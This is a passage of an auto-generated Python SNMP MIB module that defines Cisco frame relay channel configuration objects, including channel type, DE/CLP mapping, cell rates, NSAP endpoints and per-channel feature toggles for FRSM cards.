if mibBuilder.loadTexts: chanType.setReference('FRF.8')
if mibBuilder.loadTexts: chanType.setStatus('current')
if mibBuilder.loadTexts: chanType.setDescription("The value of this object is used for setting the channel type of a frame relay connection. If set with values frSIW-transparent(2) and frSIW-translate(3), all PVC data is subject to service interworking translation and mapping in both Frame Relay-to-ATM and ATM-to-Frame relay directions. The possible values are : frNIW(1) : Frame-Relay-to ATM Network Interworking(NIW-unicast). The traffic crosses the network as ATM Cells. frSIW-transparent(2): Service InterWorking with out any SDU translation. In transparent mode, the service module does not translate. frSIW-translate(3) : Service InterWorking with SDU translation. In translation mode, service module translates protocol between the FR NLPID encapsulation(RFC 1490) and ATM LCC encapsulation(RFC 1483). Translation mode support includes address resolution by transforming address resolution protocol (ARP, RFC 826) and inverse ARP(RFC 1293) between the frame relay and ATM Formats. frFUNI(4) : Frame based UNI: mode-1a which is ALL5. frForward(5) : frame forwarding. Frame forwarding operates same as standard frame relay except: * 2 byte Q.922 header is not assumed or interpreted. * All frames received are mapped to a specific connection if it exists. Otherwise the frames are dropped. * No DE/CLP or FECN/EFCI mapping is performed. * 'llegal Header count' and 'invalid DLCI' statistics are not kept/applicable. frNIWReplace(6) : Frame Relay network interworking with DLCI in FR-SSCS(Frame Relay Specific Convergence Sublayer)PDU always set to 1022. ")
chanFECNconfig = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 26), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("mapEFCI", 1), ("setEFCIzero", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanFECNconfig.setReference('FRF.8, section 4.3.1.1')
if mibBuilder.loadTexts: chanFECNconfig.setStatus('current')
if mibBuilder.loadTexts: chanFECNconfig.setDescription('The value of this object specifies how to map from FECN field in the frame Relay PDU to the EFCI field in the ATM cells. This object does not apply to NIW. This is applicable only for SIW. mapEFCI(1) : Maps the FECN bits in frame-relay to EFCI bit in the ATM cells. This value is valid only for SIW. setEFCIzero(2): Set EFCI = 0. Do not map FECN to EFCI.')
chanDEtoCLPmap = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 27), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("mapCLP", 1), ("setCLPzero", 2), ("setCLPone", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanDEtoCLPmap.setReference('FRF.5, FRF.8')
if mibBuilder.loadTexts: chanDEtoCLPmap.setStatus('current')
if mibBuilder.loadTexts: chanDEtoCLPmap.setDescription('The value of this object specifies how to map from DE bit on the Frame Relay side to CLP bit on the ATM side. mapCLP(1) : Map DE bit to CLP bit in ATM cell. setCLPzero(2) : Ignore DE bit. Set CLP to 0. setCLPone(3) : Ignore DE bit. Set CLP to 1. For FRSM12 Card: Should not be mapCLP for chanType of frForward. ')
chanCLPtoDEmap = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 28), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("mapDE", 1), ("setDEzero", 2), ("setDEone", 3), ("ignoreCLP", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanCLPtoDEmap.setReference('FRF.8, section 4.2.2 FRF.5, section 4.4.2')
if mibBuilder.loadTexts: chanCLPtoDEmap.setStatus('current')
if mibBuilder.loadTexts: chanCLPtoDEmap.setDescription('The value of this object enables mapping of Cell Loss Priority(CLP) bit on the ATM Side to Discard Eligibility(DE) bit on the Frame relay side. The possible values are : mapDE(1) : Map CLP bit to DE bit. Valid for SIW and NIW. setDEzero(2) : Ignore CLP. Set DE bit to 0. Valid for SIW. setDEone(3) : Ignore CLP. Set DE bit to 1. Valid for SIW. ignoreCLP(4) : Ignore CLP. No change in received DE bit. Valid for NIW. For FRSM12 Card: Should be ignoreCLP for chanType of frForward. Should not be setDEzero/setDEone for chanType of frNIW and frNIWReplace. Should not be ignoreCLP for chanType of frSIW-transparent and frSIW-translate. ')
chanIngrPercentUtil = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 29), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 100)).clone(100)).setUnits('percentage').setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanIngrPercentUtil.setStatus('current')
if mibBuilder.loadTexts: chanIngrPercentUtil.setDescription('The ingress utilization on a frame relay connection.')
chanEgrPercentUtil = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 30), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 100)).clone(100)).setUnits('percentage').setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanEgrPercentUtil.setStatus('current')
if mibBuilder.loadTexts: chanEgrPercentUtil.setDescription('The egress utilization on a frame relay connection.')
chanEgrSrvRate = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 31), Integer32().subtype(subtypeSpec=ValueRangeConstraint(2400, 52000000)).clone(2400)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanEgrSrvRate.setStatus('current')
if mibBuilder.loadTexts: chanEgrSrvRate.setDescription('The value of this object identifies egress CIR value for a frame relay connection. The value of this object must be less than or equal(<=) to the port speed. The value supported depends upon the interface and service module(card) type. For E1 Service Module : Range is 2400..2048000 For T1 Service Module : Range is 2400..1536000 2CT3 Module : For E3 Service Module : Range is 2400..34368000 For T3 Service Module : Range is 2400..44736000 For HSSI Service Module : Range is 2400..52000000 For FRSM12 Card: This object is used only for CAC and the range will be same as the range for cir object. The Maximum value is 44736000m. ')
chanOvrSubOvrRide = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 32), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("disable", 1), ("enable", 2))).clone('disable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanOvrSubOvrRide.setStatus('current')
if mibBuilder.loadTexts: chanOvrSubOvrRide.setDescription('The value of this object enables/disables the oversubscription on a connection. This object allows one to add a new connection on a port even if it is over subscribed. For FRSM12 Card: Not Supported.')
chanFrConnType = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 33), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("pvc", 1), ("svc", 2), ("spvc", 3), ("par", 4), ("pnni", 5), ("tag", 6))).clone('pvc')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanFrConnType.setStatus('current')
if mibBuilder.loadTexts: chanFrConnType.setDescription('The value of this object is used for configuring connection type of a frame relay connection. The possible values are : pvc(1) : Permanent Virtual Connection svc(2) : Switched Virtual Connection spvc(3) : Soft PVC. par(4) : Portable Auto Route Connection. Valid only for trunk connection pnni(5) : PNNI Connection Valid only for trunk connection tag(6) : Tag/MPLS Connection Valid only for trunk connection For FRSM12 Card: Not Supported.')
frCDRNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 34), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frCDRNumber.setStatus('current')
if mibBuilder.loadTexts: frCDRNumber.setDescription('The value of this object identifies the CDR(Call Detail Record) number. This is the key to correlate cell/frame counts, start/end record. For FRSM12 Card: Not Supported ')
frLocalVpi = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 35), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: frLocalVpi.setStatus('current')
if mibBuilder.loadTexts: frLocalVpi.setDescription('The value of this object provides the VPI value for the local endpoint. This object in conjunction with frLocalVci and frLocalNSAP represents the local end point of this connection. The service module sets this to value 0.')
frLocalVci = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 36), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: frLocalVci.setStatus('current')
if mibBuilder.loadTexts: frLocalVci.setDescription("The value of this object provides the VCI value for the local endpoint. This object in conjunction with frLocalVpi and frLocalNSAP represents the local end point of this connection. The service module assigns this value specified in object 'dLCI'.")
frLocalNSAP = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 37), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 20))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frLocalNSAP.setStatus('current')
if mibBuilder.loadTexts: frLocalNSAP.setDescription('The value of this object identifies the NSAP address of the frame relay connection. The value of this object follows the format: Prefix : 13 Bytes Cisco ID : 2 bytes Reserved : 1 byte Slot Number : 1 byte Port Number : 2 bytes ESL : 1 byte For FRSM12 Card: This object will have the NSAP format as required by the PNNI controller ')
frRemoteVpi = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 38), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frRemoteVpi.setStatus('current')
if mibBuilder.loadTexts: frRemoteVpi.setDescription('The value of this object identifies the VPI value of remote end point of this connection. The frRemoteVpi, frRemoteVci and frRemoteNSAP identifies the remote end point of this connection.')
frRemoteVci = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 39), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frRemoteVci.setStatus('current')
if mibBuilder.loadTexts: frRemoteVci.setDescription('The value of this object identifies the VCI value of remote end point of this connection. The frRemoteVpi, frRemoteVci and frRemoteNSAP identifies the remote end point of this connection.')
frRemoteNSAP = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 40), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 20))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frRemoteNSAP.setStatus('current')
if mibBuilder.loadTexts: frRemoteNSAP.setDescription('The value of this object identifies the NSAP address of the frame relay connection. The value of this object follows the format: Prefix : 13 Bytes Cisco ID : 2 bytes Reserved : 1 byte Slot Number : 1 byte Port Number : 2 bytes ESL : 1 byte.')
frMastership = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 41), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("master", 1), ("slave", 2), ("unknown", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frMastership.setStatus('current')
if mibBuilder.loadTexts: frMastership.setDescription(' This is used by PXM to determine if this end point is master or slave, a new type unknown is added to identify the SM in MGX8220 shelf and the SM in MGX shelf. In AXIS shelf, user can still use addchan to add a channel without specifying X/Y/P parameters. But in MGX shelf, if the user uses addchan without X/Y/P set (based on this object being set to type 3 unknown), SPM on PXM will reject the request. It must be supplied in connection setup request. In the feeder mode, this is always set to master. ')
frVpcFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 42), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("vpc", 1), ("vcc", 2))).clone('vcc')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frVpcFlag.setStatus('current')
if mibBuilder.loadTexts: frVpcFlag.setDescription(" This represents the connection type, used for PXM to identify VPC/VCC but FRSM card doesn't use it always set to vcc for FRSM card For FRSM12 Card: For chanFrConnType = pnni(5), this object is set to vcc(2) always.")
frConnServiceType = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 43), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32))).clone(namedValues=NamedValues(("cbr", 1), ("vbr", 2), ("notUsed", 3), ("ubr", 4), ("atfr", 5), ("abrstd", 6), ("abrfst", 7), ("vbrrt", 8), ("cbr1", 21), ("vbr1rt", 22), ("vbr2rt", 23), ("vbr3rt", 24), ("vbr1nrt", 25), ("vbr2nrt", 26), ("vbr3nrt", 27), ("ubr1", 28), ("ubr2", 29), ("stdabr", 30), ("cbr2", 31), ("cbr3", 32))).clone('atfr')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnServiceType.setStatus('current')
if mibBuilder.loadTexts: frConnServiceType.setDescription("This specifies the service type 1 ==> Constant Bit Rate 2 ==> Variable Bit Rate 3 ==> Not used 4 ==> Unspecified Bit Rate 5 ==> ATM frame relay 6 ==> standard ABR 7 ==> foresight ABR Note that this is used by PXM card, SV+ doesn't need to set it, if not set in the connection setup request, it'll be defaulted to ATFR type for FRSM. Also to make it compatible with existing AUSM MIB definition, value 3 is not used. The following types are being added for PNNI support. and are based on UNI 4.0 cbr1 (21) - CBR.1 vbr1rt (22) - Real time VBR.1 vbr2rt (23) - Real time VBR.2 vbr3rt (24) - Real time VBR.3 vbr1nrt(25) - Non Real time VBR.1 vbr2nrt(26) - Non Real time VBR.2 vbr3nrt(27) - Non Real time VBR.3 ubr1 (28) - UBR.1 ubr2 (29) - UBR.2 stdabr (30) - TM 4.0 compliant standard ABR cbr2 (31) - CBR.2 cbr3 (32) - CBR.3 For FRSM12 Card: Not Supported. Derived from chanServType. ")
frRoutingPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 44), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 15)).clone(1)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frRoutingPriority.setStatus('current')
if mibBuilder.loadTexts: frRoutingPriority.setDescription(' This is used by PXM to determine how important this connection is when selecting connections to route ')
frMaxCost = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 45), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frMaxCost.setStatus('current')
if mibBuilder.loadTexts: frMaxCost.setDescription("The value of this object specifies the Maximum allowed cost. It is related to Cost Based Routing. This is used by PXM so that it won't choose a path with a cost greater than this configured level. This is not necessary to be provided in the connection setup request, if not provided, the default value 255 will be used. Also the range supported depends upon the controller configured : Controller Range Default Value chanFrConnType = par(2) 1..65535 255 chanFrConnType = pnni(5) 1..2147483647 2147483647. ")
frRestrictTrunkType = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 46), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("norestriction", 1), ("terrestrialTrunk", 2), ("sateliteTrunk", 3))).clone('norestriction')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frRestrictTrunkType.setStatus('current')
if mibBuilder.loadTexts: frRestrictTrunkType.setDescription(' Restricted trunk type for routing, used by PXM. It specifies that the connection either cannot be routed over satelite trunks, or terrestrial trunks, or it can be on any type of trunk. It is not necessary to be provide in the connection setup request, the default value is norestriction(1). For FRSM12 Card: Not Supported ')
frConnPCR = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 47), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnPCR.setStatus('current')
if mibBuilder.loadTexts: frConnPCR.setDescription("The value of this object identifies the PCR(Peak Cell Rate). If not provided in the connection setup request, it'll be derived from object 'pir'. For FRSM12 Card: Default value is (1.44 * CIR) ")
frConnRemotePCR = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 48), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnRemotePCR.setStatus('current')
if mibBuilder.loadTexts: frConnRemotePCR.setDescription(' Peak cell rate of the other end, if not set, will be set to the same as local end PCR (frConnPCR). However, note that if the CIRs for both local and remote end are set to the different value (i.e., asymmetric conn), then this should be set differently from local end PCR. For FRSM12 Card: Default value is frConnPCR ')
frConnMCR = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 49), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnMCR.setStatus('current')
if mibBuilder.loadTexts: frConnMCR.setDescription(" Minimum cell rate, if not provided in the connection setup request, it'll be derived from object 'mir'. For FRSM12 Card: Default value is frConnPCR ")
frConnRemoteMCR = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 50), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnRemoteMCR.setStatus('current')
if mibBuilder.loadTexts: frConnRemoteMCR.setDescription(' Minimum cell rate of the other end, if not set, will be set to the same as local end MCR (frConnMCR). However, note that if the CIRs for both local and remote end are set to the different value (i.e., asymmetric conn), then this should be set differently from local end MCR. For FRSM12 Card: Default value is frConnMCR ')
frConnPercentUtil = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 51), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 100)).clone(100)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnPercentUtil.setStatus('current')
if mibBuilder.loadTexts: frConnPercentUtil.setDescription("This is the expected long-term utilization of the channel by this end-point. If this is not specified in the connection setup request, it'll be defaulted to 100 percent For FRSM12 Card: Not Supported ")
frConnRemotePercentUtil = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 52), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 100))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnRemotePercentUtil.setStatus('current')
if mibBuilder.loadTexts: frConnRemotePercentUtil.setDescription("This is the expected long-term utilization of the channel by the other end-point. If this is not specified in the connection setup request, it'll be set to be the same as the local end frConnPercentUtil value assuming that the connection is symmetric. In a asymmetric connection, this object is supposed to be set. For FRSM12 Card: Not Supported.")
frConnForeSightEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 53), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnForeSightEnable.setStatus('current')
if mibBuilder.loadTexts: frConnForeSightEnable.setDescription("This object is used by the controller(PAR/PNNI/TAG) to set up the Qbin for the connection, if this is not set, it'll be defaulted by SM to the same as foreSightEnable in the end point parameters. For FRSM12 Card: Not Supported.")
frConnFGCRAEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 54), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('disable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnFGCRAEnable.setStatus('current')
if mibBuilder.loadTexts: frConnFGCRAEnable.setDescription('The value of this object is used for enabling/disabling Frame based GCRA (early packet discard). For FRSM12 Card: Not Supported.')
chanServType = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 55), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9))).clone(namedValues=NamedValues(("highpriority", 1), ("rtVBR", 2), ("nrtVBR", 3), ("aBR", 4), ("uBR", 5), ("queue6", 6), ("queue7", 7), ("queue8", 8), ("stdABR", 9)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanServType.setStatus('current')
if mibBuilder.loadTexts: chanServType.setDescription('The value of this object indicates the class of the connection. 1-High priority (typically CBR connections) 2- real-time VBR 3- non-real time VBR 4- Available Bit Rate 5- Unspecified Bit Rate 9- Standard ABR There are 8 queues actually but only 4 are being used (the 4 queues are for CBR, VBR-rt, <VBR-nrt and ABR>, UBR traffic). This object is supported only in FRSM-VHS and FRSM-8T1E1. For FRSM-8T1E1, a 0 indicates that the connections are of old model type where chanServType object is unused. For FRSM12 Card: The types aBR, queue6, queue7, queue8 are not supported. This object can not be modified after a frame relay connection has been created.')
chanServiceRateOverride = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 56), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('disable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanServiceRateOverride.setStatus('current')
if mibBuilder.loadTexts: chanServiceRateOverride.setDescription('This variable sets the SAR IR programming option. Foresight and chanServiceRateOverride are mutually exclusive. For FRSM12 Card: Not Supported.')
chanServiceRate = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 57), Integer32().subtype(subtypeSpec=ValueRangeConstraint(160, 6400000))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanServiceRate.setStatus('current')
if mibBuilder.loadTexts: chanServiceRate.setDescription('This is the rate to which IR can be set to when chanServiceRateOverride is set to enable(1). If chanServiceRateOverride is disable(2) then this object does not have any significance. For FRSM-8T1/8E1,this is defined in fastpackets/sec. For FRSM-VHS, this is defined in atm cells per second. For VHS the range in cells per second will be 10 to 400000 cps. For FRSM12 Card: Not Supported.')
zeroCirConEir = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 58), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 52000000))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: zeroCirConEir.setStatus('current')
if mibBuilder.loadTexts: zeroCirConEir.setDescription("The value of this object defines the EIR value for a '0' CIR connection. If the value is '0', EIR is set to port speed. If zeroCirConEir is a non-zero value, EIR is set to the value of this object, and this value is used for policing in the ingress direction. This object is valid only for a zero cir connection. zeroCirConEir has to be less than or equal to the port speed.")
chanReroute = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 59), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("true", 1), ("false", 2))).clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanReroute.setStatus('current')
if mibBuilder.loadTexts: chanReroute.setDescription(' This is used by the administrator to trigger the re-routing of the connection. The rerouting takes effect, when this object is set to true(1). When set to false (2), no action is taken. A get on this object always returns false (2). This object is not applicable to MGX Release 1.x. ')
frConnSCR = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 60), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnSCR.setStatus('current')
if mibBuilder.loadTexts: frConnSCR.setDescription(' Sustained cell rate, Used for VBR connections setup with PNNI controller. For FRSM12 Card: Default value is frConnPCR This object is not applicable to MGX Release 1.x.')
frConnRemoteSCR = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 61), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnRemoteSCR.setStatus('current')
if mibBuilder.loadTexts: frConnRemoteSCR.setDescription(' Sustained cell rate of the other end, Used for VBR connections setup with PNNI controller. For FRSM12 Card: Default value is frConnSCR This object is not applicable to MGX Release 1.x ')
frConnTemplateId = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 62), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 17)).clone(17)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnTemplateId.setStatus('current')
if mibBuilder.loadTexts: frConnTemplateId.setDescription('This object specifies the template identifier for the connection template associated with this connection. The valid range for templates is 1..16. A value of 17 indicates no template is associated with this connection For FRSM12 Card: Not Supported This object is not applicable to MGX Release 1.x ')
frConnAdminStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 63), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("up", 1), ("down", 2))).clone('down')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frConnAdminStatus.setStatus('current')
if mibBuilder.loadTexts: frConnAdminStatus.setDescription('This object specifies channel admin status. This object is not applicable to MGX Release 1.x.')
frChanCnfChangeCount = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 64), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: frChanCnfChangeCount.setStatus('current')
if mibBuilder.loadTexts: frChanCnfChangeCount.setDescription('This object is added only for FRSM12 card. This counter tracks the number of configuration changes that happen on a channel. The counter is associated only with the end point and NOT with the connection itself. This counter is used by the NMS to determine if a connection configuration had been modified and requires an upload. This functionality is conventionally achieved by time stamping using a time-of-day clock. However, in switches where time-of-day clock is not available, the following scheme is used: The upload counter is incremented, when: * assignment of connection to an end point channel. This happens when a connection is added and assigned this channel number. * de-assignment of connection from a channel number. This happens when a connection is deleted and the end point resource is released. * When there is a configuration change done to the connection that is associated with this end point channel number. In a new system, an unutilised resouce (channel number) has a counter value of zero. When a connection is added to this channel end point, the counter is incremented. And is incremented for any of the above operations. When a connection is deleted the value of this counter is incremented and preserved till a new connection gets associated with this channel end point. This object is not applicable to MGX Release 1.x.')
frChanCnfIgnoreIncomingDE = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 65), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frChanCnfIgnoreIncomingDE.setStatus('current')
if mibBuilder.loadTexts: frChanCnfIgnoreIncomingDE.setDescription('This object is added for FRSM12 card. When this object is enabled, the incoming frames with DE(Discard Eligible) bit set to 1 are counted in the Bc bucket instead of Be bucket This object is not applicable to MGX Release 1.x.')
frChanOamCCEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 66), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('disable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frChanOamCCEnable.setStatus('current')
if mibBuilder.loadTexts: frChanOamCCEnable.setDescription('This object is added for FRSM12 card. This object serves to enable or disable continuity check(CC) on a connection endpoint. When continuity check is enabled on an endpoint, the endpoint anticipates OAM CC cells from its peer endpoint. OAM CC cells are sent when the peer endpoint does not have traffic cells to send. If the connection is idle and this endpoint has not received OAM CC cells for a period of 3.5 +/- 0.5 seconds, it declares continuity failure. This object serves to administratively control the CC feature. Typical implementations (of this feature) may choose to ignore this control or impose other conditions to actually enable CC cell flow. However, if this object is set to false(2), then this feature should be disabled This object is not applicable to MGX Release 1.x.')
frChanStatsEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 67), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('disable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frChanStatsEnable.setStatus('current')
if mibBuilder.loadTexts: frChanStatsEnable.setDescription(' This object serves the purpose of enabling/disabling statistics collection on a per connection basis. In implementations which do not have such limitations, this object can be set to enable(1) for all connections. Limits imposed by software or hardware implementations could restrict the amount of statistical data that can be maintained in a physical entity (like a service module card). Hence there could be a need to restrict statistics collection to a smaller subset. This object is not applicable to MGX Release 1.x.')
frChanLocalLpbkEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 68), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('disable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frChanLocalLpbkEnable.setStatus('current')
if mibBuilder.loadTexts: frChanLocalLpbkEnable.setDescription('This object is added for FRSM12 card. This object when enabled adds a channel-level loopback towards the port side. If the connection is in loopback, Connection MIB (FrChanCnfGrpEntry) variables cannot be modified. This object is not applicable to MGX Release 1.x. ')
frChanUpcEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 69), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('enable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: frChanUpcEnable.setStatus('current')
if mibBuilder.loadTexts: frChanUpcEnable.setDescription(' This object is added for FRSM12 card. This object when disabled, disables Frame Relay policing. This object is not applicable to MGX Release 1.x. ')
frChanSlaveType = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 70), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("persistentSlave", 1), ("nonPersistentSlave", 2))).clone('persistentSlave')).setMaxAccess("readwrite")
